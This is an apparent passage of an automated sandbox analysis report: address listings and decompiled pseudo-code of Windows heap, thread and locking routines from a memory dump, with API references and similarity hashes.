0x6ab63c6a
0x6ab63c6d
0x6ab63c74
0x6ab63c79
0x6ab63c7b
0x6ab63c7e
0x6ab63c80
0x6ab63c83
0x6ab63c89
0x6ab63c8b
0x6ab63dea
0x6ab63df1
0x6ab63df2
0x6ab63df5
0x6ab63df8
0x6ab63dfb
0x6ab63dfd
0x00000000
0x00000000
0x6ab63e03
0x6ab63e07
0x6ab63e42
0x6ab63e49
0x6ab63e4a
0x6ab63e4d
0x00000000
0x6ab63e4d
0x6ab63e09
0x6ab63d86
0x6ab63d89
0x6ab63d8c
0x6ab63d8e
0x6ab63e31
0x6ab63e31
0x6ab63d94
0x00000000
0x6ab63d94
0x6ab63c91
0x6ab63c91
0x6ab63c94
0x6ab63d23
0x6ab63d23
0x6ab63d27
0x6ab63e16
0x6ab63e16
0x6ab63d2d
0x6ab63d31
0x6abc01fe
0x6abc01fe
0x6ab63d84
0x6ab63d84
0x00000000
0x6ab63d84
0x6ab63d3d
0x6ab63d44
0x6ab63d45
0x6ab63d48
0x6ab63d4f
0x6abc01de
0x6abc01de
0x6abc01e2
0x00000000
0x00000000
0x6abc01ea
0x6abc01ea
0x6abc01eb
0x6abc01f9
0x00000000
0x6abc01f9
0x6ab63d55
0x6ab63d5c
0x00000000
0x00000000
0x6ab63d62
0x6ab63d66
0x6ab63e55
0x6ab63e5e
0x6ab63e60
0x00000000
0x00000000
0x6ab63d75
0x6ab63d75
0x6ab63d79
0x6ab63d7b
0x6ab63d7e
0x6abc01c7
0x6abc01ca
0x6abc01cd
0x6abc01d0
0x6abc01d3
0x6abc01d6
0x6abc01d6
0x6ab63d7e
0x00000000
0x6ab63d79
0x6ab63d6c
0x6ab63d72
0x00000000
0x6ab63d72
0x6ab63c9d
0x6ab63ca0
0x6ab63cab
0x6ab63cae
0x6ab63cb1
0x6ab63cb5
0x6ab63cb7
0x6ab63cd2
0x6ab63cdb
0x6ab63cdb
0x6ab63cde
0x6ab63ce1
0x6ab63ce3
0x6abc00fa
0x6abc00fd
0x00000000
0x00000000
0x6abc0103
0x6abc0107
0x6abc0113
0x6abc0125
0x6abc012b
0x6abc012e
0x6abc0131
0x00000000
0x6abc0131
0x6abc0109
0x6abc010d
0x00000000
0x00000000
0x00000000
0x6ab63ce9
0x6ab63ce9
0x6ab63ce9
0x6ab63cee
0x6abc0139
0x6abc0149
0x6abc014f
0x6abc014f
0x6ab63cf4
0x6ab63cf9
0x6ab63cfb
0x6abc0160
0x6ab63d01
0x6ab63d01
0x6ab63d01
0x6ab63d06
0x6ab63d09
0x6abc0184
0x6abc0184
0x6ab63d0f
0x6ab63d16
0x6ab63d1e
0x00000000
0x6ab63d1e
0x6ab63ce3
0x6abc00ca
0x6ab63ddd
0x6ab63de0
0x00000000
0x00000000
0x00000000
0x6ab63de2
0x6ab63c08
0x6ab63c0b
0x6ab63dc9
0x6ab63dcb
0x00000000
0x00000000
0x00000000
0x6ab63dcb
0x00000000
0x6ab63c0b

APIs

RtlAcquireSRWLockExclusive.1105(00000000,6AC3F4D0,00000084,6AB63A18,00000000,?,?), ref: 6AB63B05
RtlReleaseSRWLockExclusive.1105(?,?,00000000,6AC3F4D0,00000084,6AB63A18,00000000,?,?), ref: 6AB63B1A
RtlReleaseSRWLockExclusive.1105(?,?,?,?,?,?,00000000,6AC3F4D0,00000084,6AB63A18,00000000,?,?), ref: 6AB63C74

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$Release$Acquire
String ID:
API String ID: 1021914862-0
Opcode ID: b08b1251326438bfd07aa7215ad2c60f1b4408bd9e1dda4dfc67a214b7da70bb
Instruction ID: 8fe618d5acd56ed317fdea839d19286d3a3ba8c433fe40bd2d6631d081733d7f
Opcode Fuzzy Hash: b08b1251326438bfd07aa7215ad2c60f1b4408bd9e1dda4dfc67a214b7da70bb
Instruction Fuzzy Hash: 62E10FB0E01688DFCB65CFA9C984A8DFBF1FF48300F21552AE556A7261DB31A841EF10

Uniqueness

Uniqueness Score: -1.00%

Function 6AB9AC7B, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 205
nativeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6AB9AC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x9
					E6ABBD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x6ac58a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1018
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x21
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E6ABA96E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E6AC13C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E6ABA96E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E6AB6B150();
							} else {
								E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E6AB6B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E6AC214FB(_t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E6AB87D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E6AC21411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E6AB87D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E6AC21411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}

0x6ab9ac85
0x6ab9ac88
0x6ab9ac8a
0x6ab9ac8d
0x6ab9ac91
0x6ab9ac99
0x6ab9ac9c
0x6abd9f57
0x6abd9f5b
0x6abd9f60
0x6abd9f60
0x6ab9aca8
0x6ab9acae
0x6ab9acda
0x6ab9acde
0x6ab9ace8
0x6ab9aceb
0x6ab9acee
0x00000000
0x6ab9acee
0x6ab9acf6
0x6ab9acb0
0x6ab9acb0
0x6ab9acbb
0x6ab9acbd
0x6ab9acc0
0x6ab9acc5
0x6ab9adae
0x6ab9adb4
0x6ab9adb4
0x6ab9acd4
0x6ab9acd8
0x6ab9acf9
0x6ab9acff
0x6ab9ad04
0x6ab9ad08
0x6ab9ad09
0x6ab9ad10
0x6ab9ad12
0x6ab9ad18
0x6abd9f6f
0x6abd9f74
0x6abd9f76
0x6abd9f7c
0x6abd9f84
0x6abd9f88
0x6abd9f89
0x6abd9f90
0x6abd9f90
0x6abd9f76
0x6ab9ad1e
0x6ab9ad24
0x6ab9ad26
0x6abda097
0x6abda09b
0x6abda0ba
0x6abda0bf
0x6abda09d
0x6abda0b2
0x6abda0b7
0x6abda0c5
0x6abda0c8
0x6abda0cb
0x6abda0d2
0x00000000
0x6ab9ad2c
0x6ab9ad2c
0x6ab9ad2f
0x6ab9ad34
0x6ab9ad36
0x6abd9f97
0x6abd9f9a
0x00000000
0x00000000
0x6abd9fa9
0x6ab9ad3e
0x6ab9ad3e
0x6ab9ad41
0x6abd9fb3
0x6abd9fb9
0x6abd9fc0
0x6abd9fd0
0x6abd9fd0
0x6abd9fc0
0x6ab9ad4a
0x6ab9ad50
0x6ab9ad5c
0x6ab9ad62
0x6ab9ad68
0x6ab9ad6b
0x6ab9ad6d
0x6abd9fda
0x6abd9fdd
0x00000000
0x00000000
0x6abd9fec
0x00000000
0x6ab9ad73
0x6ab9ad73
0x6ab9ad73
0x6ab9ad75
0x6ab9ad75
0x6ab9ad78
0x6abd9ff6
0x6abd9ffc
0x6abda003
0x6abda00e
0x6abda010
0x6abda01b
0x6abda01b
0x6abda01b
0x6abda038
0x6abda038
0x6abda003
0x6ab9ad84
0x6ab9ad89
0x6ab9ad8c
0x6ab9ad8e
0x6abda042
0x6abda045
0x00000000
0x00000000
0x6abda054
0x00000000
0x6ab9ad94
0x6ab9ad94
0x6ab9ad94
0x6ab9ad96
0x6ab9ad96
0x6ab9ad99
0x6abda063
0x6abda065
0x6abda070
0x6abda070
0x6abda070
0x6abda08d
0x6abda08d
0x6ab9ada4
0x6ab9ada6
0x00000000
0x6ab9ada6
0x6ab9ad8e
0x6ab9ad6d
0x6ab9ad3c
0x6ab9ad3c
0x00000000
0x6ab9ad3c
0x00000000
0x00000000
0x00000000
0x6ab9acd8

APIs

ZwFreeVirtualMemory.1105(000000FF,-00000018,?,00004000,?,-00000007,00000001,?,-00000018,?), ref: 6AB9AD0B
RtlFillMemoryUlong.1105(00000009,?,FEEEFEEE,?,-00000007,00000001,?,-00000018,?), ref: 6ABD9F5B

Strings

RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 6ABDA0CD
HEAP[%wZ]: , xrefs: 6ABDA0AD
HEAP: , xrefs: 6ABDA0BA

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Memory$FillFreeUlongVirtual
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 3117835691-1340214556
Opcode ID: 061c3781e9cb2dc55edab7341d5f13388f800b0fde5ba62f9667e6e99e92e7c4
Instruction ID: c4e2d9597a017a83d10f34e8cbbf2eba0ec185b6c25794caeeae4bda03b5a8d5
Opcode Fuzzy Hash: 061c3781e9cb2dc55edab7341d5f13388f800b0fde5ba62f9667e6e99e92e7c4
Instruction Fuzzy Hash: D98104716446C4EFD722CBA8C894F99BBF8FF06314F0141A9E5548B6A2DF34E951EB20

Uniqueness

Uniqueness Score: -1.00%

Function 6ABFB8D0, Relevance: 19.7, APIs: 13, Instructions: 199
memorynativethreadCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E6ABFB8D0(intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				long _v8;
				signed int _v12;
				signed int _t80;
				void* _t83;
				void* _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				signed int _t115;
				void* _t116;
				void* _t118;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t124 = RtlAllocateHeap( *( *[fs:0x30] + 0x18),  *0x6ac57b9c + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E6ABA9800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E6ABA95B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E6ABA95D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *( *[fs:0x30] + 0x18));
								L37:
								RtlFreeHeap();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E6ABA9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t83);
												}
											}
											_push( *_t124);
											E6ABA95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t92 = RtlAllocateHeap( *( *[fs:0x30] + 0x18),  *0x6ac57b9c + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E6ABA9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t115 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t115 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t115 + _t119 - 4) =  *(_t115 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E6AB6A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t116 = 0x28;
						_t122 = E6ABFE7D3(_t116, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *( *[fs:0x30] + 0x18));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t118 = 4;
					_t122 = E6ABFE7D3(_t118, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E6ABA95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x6abfb8d9
0x6abfb8e4
0x00000000
0x6abfb8e6
0x6abfb8f3
0x6abfb8f5
0x6abfb8f5
0x6abfb920
0x6abfb924
0x6abfb936
0x6abfb939
0x6abfb93d
0x6abfb948
0x6abfb9a0
0x6abfb9a0
0x6abfb9a4
0x6abfb9bf
0x6abfb9c4
0x6abfb9c6
0x6abfb9cd
0x6abfb9d1
0x6abfbad4
0x6abfbad8
0x6abfbada
0x6abfbadc
0x6abfbadc
0x6abfbadf
0x6abfbae0
0x6abfbae2
0x6abfbae4
0x6abfbaec
0x6abfbaee
0x6abfbaf0
0x6abfbaf0
0x6abfbaec
0x6abfbafb
0x6abfbafc
0x6abfbafe
0x6abfbb01
0x6abfbb01
0x00000000
0x6abfbb06
0x6abfb9d7
0x6abfb9db
0x6abfb9db
0x6abfb9de
0x6abfb9de
0x6abfb9e4
0x6abfb9e7
0x6abfb9ea
0x6abfb9ec
0x6abfb9ef
0x6abfb9f3
0x6abfba1b
0x6abfba23
0x6abfba24
0x6abfba27
0x6abfba2a
0x6abfba2b
0x6abfba2e
0x6abfba30
0x6abfba37
0x6abfba3f
0x6abfba9c
0x6abfbaa2
0x6abfbb13
0x6abfbb15
0x6abfbaae
0x6abfbaae
0x6abfbab3
0x6abfbab5
0x6abfbaba
0x6abfbac8
0x6abfbac8
0x6abfbaba
0x6abfbacd
0x6abfbacf
0x00000000
0x6abfbacf
0x6abfbb1a
0x00000000
0x6abfbb1c
0x6abfbaa7
0x6abfbb11
0x00000000
0x6abfbb11
0x6abfbaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x6abfba41
0x6abfba41
0x6abfba58
0x6abfba5d
0x6abfba62
0x00000000
0x00000000
0x6abfba67
0x6abfba68
0x6abfba69
0x6abfba6c
0x6abfba6f
0x6abfba71
0x6abfba78
0x6abfba80
0x00000000
0x00000000
0x6abfba90
0x6abfba90
0x6abfba97
0x00000000
0x6abfba97
0x6abfb9f5
0x6abfb9f7
0x6abfb9f7
0x6abfb9fa
0x6abfba03
0x6abfba07
0x6abfba0c
0x6abfba10
0x6abfba17
0x00000000
0x6abfb9f7
0x6abfb9a6
0x6abfb9a8
0x6abfb9af
0x6abfb9b3
0x00000000
0x00000000
0x6abfb9b9
0x00000000
0x6abfb9b9
0x6abfb94d
0x6abfb98f
0x6abfb995
0x6abfb999
0x6abfb960
0x6abfb967
0x6abfb968
0x6abfb96a
0x00000000
0x6abfb96a
0x6abfb99b
0x6abfb99e
0x00000000
0x00000000
0x00000000
0x6abfb99e
0x6abfb951
0x6abfb954
0x6abfb95a
0x6abfb95e
0x6abfb972
0x6abfb979
0x6abfb97d
0x6abfb97f
0x6abfb980
0x6abfb982
0x6abfb984
0x00000000
0x6abfb984
0x00000000
0x6abfb926
0x00000000
0x6abfb926

APIs

RtlAllocateHeap.1105(?,?,?,?,00000000,00800000,?,00000000,?,?,6AB77F7A), ref: 6ABFB91B
RtlFreeHeap.1105(?,00000000,?,00000000,00000000,?,00000400,?,?,000000FF,00000028,00000200,00000000), ref: 6ABFBAC8
ZwClose.1105(00000000,00000000,00000000,?,00000400,?,?,000000FF,00000028,00000200,00000000), ref: 6ABFBACF
ZwSetInformationThread.1105(000000FE,00000005,00000004,00000004,000000FF,00000028,00000200,00000000), ref: 6ABFBAE4
ZwClose.1105(00000004,000000FE,00000005,00000004,00000004,000000FF,00000028,00000200,00000000), ref: 6ABFBAF0
RtlFreeHeap.1105(?,00000000,00000000,000000FF,00000028,00000200,00000000), ref: 6ABFBB01

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$CloseFree$AllocateInformationThread
String ID:
API String ID: 194745801-0
Opcode ID: 71811170e5d04ed2c00e1dfaca01a59097295629ef7305db6db94f00730f3194
Instruction ID: 372bb05d6cf5915932b3c5bcaf54049ec9e67b1d474e4d573660bbf615bf2f3d
Opcode Fuzzy Hash: 71811170e5d04ed2c00e1dfaca01a59097295629ef7305db6db94f00730f3194
Instruction Fuzzy Hash: 01713532240B81EFD721CF18C844F5AB7F5EF44714F1A8929E655872A2DF71D94AEB40

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6395E, Relevance: 19.7, APIs: 13, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6AB6395E(void* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t67;
				void* _t77;
				intOrPtr* _t81;
				signed int _t93;
				void* _t94;
				intOrPtr* _t97;
				intOrPtr* _t104;
				void* _t112;
				long _t113;
				signed int _t114;
				void* _t123;

				_v8 =  *0x6ac5d360 ^ _t114;
				_v16 = __edx;
				_t93 = 0;
				_t112 = __ecx;
				_v12 = _v12 & 0;
				E6AB8FAD0( *0x6ac584cc + 4);
				_t110 =  *0x6ac584cc + 8;
				_t97 =  *_t110;
				while(_t97 != _t110) {
					_t113 = _t97 - 0x1c;
					_t67 =  *((intOrPtr*)(_t112 + 0xc));
					if( *((intOrPtr*)(_t113 + 0x10)) !=  *((intOrPtr*)(_t112 + 8)) ||  *((intOrPtr*)(_t113 + 0x14)) != _t67 ||  *((intOrPtr*)(_t113 + 8)) !=  *_t112) {
						L21:
						_t97 =  *_t97;
						continue;
					} else {
						_t69 =  *((intOrPtr*)(_t113 + 0xc));
						if( *((intOrPtr*)(_t113 + 0xc)) !=  *((intOrPtr*)(_t112 + 4))) {
							goto L21;
						}
						_t94 = _t113 + 0x28;
						E6AB82280(_t69, _t94);
						if( *(_t113 + 0x5c) == 2) {
							__eflags = _v16;
							if(_v16 == 0) {
								RtlFreeHeap( *( *[fs:0x30] + 0x18), 0,  *(_t113 + 0x58));
								 *(_t113 + 0x58) =  *(_t113 + 0x58) & 0x00000000;
								 *(_t113 + 0x5c) =  *(_t113 + 0x5c) & 0x00000000;
								L8:
								asm("lock inc dword [esi+0x50]");
								 *(_t113 + 0x5c) = 1;
								E6AB7FFB0(_t94, _t112, _t94);
								_t123 =  *0x6ac584cc + 4;
								E6AB8FA00(_t94, _t97, _t112,  *0x6ac584cc + 4);
								while(1) {
									_t95 = 0;
									_t77 = E6AB63ACA(0, _t112, _t113, _t112, _t113, _t123, 0);
									_t124 = _t77 - 0xc000022d;
									if(_t77 == 0xc000022d) {
										_t95 = 0xc000022d;
									}
									_t110 = _t113;
									if(E6AB63ACA(_t95, _t112, _t113, _t112, _t113, _t124, 1) == 0xc000022d) {
										_t93 = 0xc000022d;
									}
									E6AB82280(_t113 + 0x28, _t113 + 0x28);
									_v12 = _v12 + 1;
									_t104 = _t113 + 0x2c;
									_t81 =  *_t104;
									while(_t81 != _t104) {
										 *(_t81 + 0x60) =  *(_t81 + 0x60) & 0x00000000;
										_t81 =  *_t81;
									}
									if( *(_t113 + 0x58) != 0) {
										_t112 =  *(_t113 + 0x58);
										 *(_t113 + 0x58) =  *(_t113 + 0x58) & 0x00000000;
										E6AB7FFB0(_t93, _t112, _t113 + 0x28);
										continue;
									}
									if(_t93 != 0) {
										__eflags = _t93 - 0xc000022d;
										if(_t93 == 0xc000022d) {
											 *(_t113 + 0x58) = _t112;
											 *(_t113 + 0x5c) = 2;
											E6ABF2DA1(_t113);
										}
										L17:
										E6AB7FFB0(_t93, _t112, _t113 + 0x28);
										E6AB9DE9E(_t113);
										L18:
										if(_v12 > 1) {
											_t113 = 0;
											_t49 = _t112 + 8; // 0x8
											_push(0);
											_push(0);
											_push(_t93);
											_push( *((intOrPtr*)(_t112 + 0x18)));
											_push(_t112);
											E6ABAA3A0();
											__eflags = _t93;
											if(_t93 == 0) {
												RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _t112);
											}
											_t93 = 0x80;
										}
										return E6ABAB640(_t93, _t93, _v8 ^ _t114, _t110, _t112, _t113);
									}
									 *(_t113 + 0x5c) =  *(_t113 + 0x5c) & _t93;
									if( *((intOrPtr*)(_t113 + 0x18)) != _t93) {
										__eflags =  *((intOrPtr*)(_t112 + 0x10)) -  *((intOrPtr*)(_t113 + 0x18));
										if( *((intOrPtr*)(_t112 + 0x10)) -  *((intOrPtr*)(_t113 + 0x18)) > 0) {
											goto L16;
										}
										goto L17;
									}
									L16:
									 *((intOrPtr*)(_t113 + 0x18)) =  *((intOrPtr*)(_t112 + 0x10));
									goto L17;
								}
							}
							_push(_t94);
							L27:
							E6AB7FFB0(_t94, _t112);
							_t93 = 0x80;
							break;
						}
						if( *(_t113 + 0x5c) == 1) {
							__eflags = _v16;
							_push(_t94);
							if(_v16 != 0) {
								goto L27;
							}
							 *(_t113 + 0x58) = _t112;
							E6AB7FFB0(_t94, _t112);
							_t93 = 0x103;
							break;
						}
						goto L8;
					}
				}
				E6AB8FA00(_t93, _t97, _t112,  *0x6ac584cc + 4);
				goto L18;
			}

0x6ab6396d
0x6ab6397b
0x6ab6397e
0x6ab63980
0x6ab63982
0x6ab63986
0x6ab63991
0x6ab63994
0x6ab63996
0x6ab639a1
0x6ab639a7
0x6ab639aa
0x6ab63aa7
0x6ab63aa7
0x00000000
0x6ab639c4
0x6ab639c4
0x6ab639ca
0x00000000
0x00000000
0x6ab639d0
0x6ab639d4
0x6ab639dd
0x6abbfffc
0x6abc0000
0x6abc0020
0x6abc0025
0x6abc0029
0x6ab639ed
0x6ab639ed
0x6ab639f2
0x6ab639f9
0x6ab63a03
0x6ab63a07
0x6ab63a0c
0x6ab63a0c
0x6ab63a13
0x6ab63a1d
0x6ab63a1f
0x6abc004b
0x6abc004b
0x6ab63a27
0x6ab63a37
0x6abc0052
0x6abc0052
0x6ab63a41
0x6ab63a46
0x6ab63a49
0x6ab63a4c
0x6ab63a4e
0x6ab63a9f
0x6ab63aa3
0x6ab63aa3
0x6ab63a56
0x6abc0059
0x6abc005f
0x6abc0064
0x00000000
0x6abc0064
0x6ab63a5e
0x6abc0073
0x6abc0075
0x6abc007d
0x6abc0080
0x6abc0087
0x6abc0087
0x6ab63a72
0x6ab63a76
0x6ab63a7d
0x6ab63a82
0x6ab63a86
0x6abc0091
0x6abc0093
0x6abc0096
0x6abc0097
0x6abc0098
0x6abc0099
0x6abc009c
0x6abc009e
0x6abc00a3
0x6abc00a5
0x6abc00b2
0x6abc00b2
0x6abc00b7
0x6abc00b7
0x6ab63a9e
0x6ab63a9e
0x6ab63a64
0x6ab63a6a
0x6ab63ac4
0x6ab63ac6
0x00000000
0x00000000
0x00000000
0x6ab63ac8
0x6ab63a6c
0x6ab63a6f
